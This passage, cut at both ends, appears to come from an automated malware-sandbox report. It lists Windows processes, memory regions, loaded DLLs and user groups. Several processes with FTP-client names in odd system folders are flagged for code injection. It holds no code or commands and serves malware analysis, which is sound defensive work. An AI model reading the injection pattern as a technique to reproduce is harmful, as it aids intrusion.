= "" Region: id = 4346 start_va = 0x5b0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 4347 start_va = 0x7b0000 end_va = 0x937fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007b0000" filename = "" Region: id = 4348 start_va = 0x940000 end_va = 0xac0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000940000" filename = "" Region: id = 4349 start_va = 0xad0000 end_va = 0xb8bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ad0000" filename = "" Region: id = 4350 start_va = 0xcc0000 end_va = 0xccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cc0000" filename = "" Region: id = 4351 start_va = 0xde0000 end_va = 0xdf6fff monitored = 0 entry_point = 0xde14a1 region_type = mapped_file name = "flashfxp.exe" filename = "\\Program Files (x86)\\Reference Assemblies\\flashfxp.exe" (normalized: "c:\\program files (x86)\\reference assemblies\\flashfxp.exe") Region: id = 4352 start_va = 0xe00000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e00000" filename = "" Region: id = 4353 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4354 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4355 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4356 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 4357 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 4358 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 4359 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4360 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4361 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4362 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4363 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4364 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4365 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4366 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4367 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4368 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4369 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4370 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4371 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 4372 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4373 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4374 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4375 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4376 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4377 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4378 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 245 os_tid = 0x1270 Thread: id = 246 os_tid = 0x1138 Process: id = "62" image_name = "isspos.exe" filename = "c:\\program files (x86)\\windows sidebar\\isspos.exe" page_root = "0x73fd0000" os_pid = "0x12f4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files (x86)\\Windows Sidebar\\isspos.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows Sidebar\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 247 os_tid = 0x1314 Thread: id = 248 os_tid = 0x12f8 Process: id = "63" image_name = "far.exe" filename = "c:\\program files\\windows nt\\far.exe" page_root = "0xe83c000" os_pid = "0x1144" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files\\Windows NT\\far.exe\" " cur_dir = "C:\\Program Files\\Windows NT\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3803 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3804 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3805 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3806 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3807 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3808 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3809 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3810 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3811 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3812 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 3813 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 3814 start_va = 0x1f0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 3815 start_va = 0x200000 end_va = 0x20ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3816 start_va = 0x210000 end_va = 0x2cdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3817 start_va = 0x360000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 3818 start_va = 0x3b0000 end_va = 0x3c6fff monitored = 0 entry_point = 0x3b14a1 region_type = mapped_file name = "far.exe" filename = "\\Program Files\\Windows NT\\far.exe" (normalized: "c:\\program files\\windows nt\\far.exe") Region: id = 3819 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3820 start_va = 0x6b0000 end_va = 0x7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 3821 start_va = 0x8b0000 end_va = 0xa37fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008b0000" filename = "" Region: id = 3822 start_va = 0xa40000 end_va = 0xbc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a40000" filename = "" Region: id = 3823 start_va = 0xbd0000 end_va = 0x1fcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bd0000" filename = "" Region: id = 3824 start_va = 0x1fd0000 end_va = 0x208bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001fd0000" filename = "" Region: id = 3825 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3826 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3827 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3828 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3829 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3830 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 3831 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3832 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3833 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3834 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3835 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3836 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3837 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3838 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3839 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3840 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3841 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3842 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3843 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3844 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3845 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3846 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3847 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3848 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3849 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3850 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 249 os_tid = 0x131c Thread: id = 250 os_tid = 0x1148 Process: id = "64" image_name = "edcsvr.exe" filename = "c:\\program files (x86)\\windows mail\\edcsvr.exe" page_root = "0x1bd3c000" os_pid = "0x12fc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files (x86)\\Windows Mail\\edcsvr.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows Mail\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 251 os_tid = 0x1318 Thread: id = 252 os_tid = 0x1300 Process: id = "65" image_name = "coreftp.exe" filename = "c:\\program files (x86)\\windows photo viewer\\coreftp.exe" page_root = "0x1e548000" os_pid = "0x1154" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\coreftp.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows Photo Viewer\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4475 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4476 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4477 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4478 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4479 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4480 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4481 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4482 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4483 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4484 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 4485 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 4486 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4487 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 4488 start_va = 0x510000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 4489 start_va = 0x610000 end_va = 0x6cdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4490 start_va = 0x7d0000 end_va = 0x957fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 4491 start_va = 0x960000 end_va = 0xae0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000960000" filename = "" Region: id = 4492 start_va = 0xaf0000 end_va = 0xbabfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000af0000" filename = "" Region: id = 4493 start_va = 0xc30000 end_va = 0xc3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c30000" filename = "" Region: id = 4494 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 4495 start_va = 0x1130000 end_va = 0x1146fff monitored = 0 entry_point = 0x11314a1 region_type = mapped_file name = "coreftp.exe" filename = "\\Program Files (x86)\\Windows Photo Viewer\\coreftp.exe" (normalized: "c:\\program files (x86)\\windows photo viewer\\coreftp.exe") Region: id = 4496 start_va = 0x1150000 end_va = 0x254ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Region: id = 4497 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4498 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4499 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4500 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 4501 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 4502 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 4503 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4504 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4505 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4506 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4507 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4508 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4509 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4510 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4511 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4512 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4513 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4514 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4515 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: 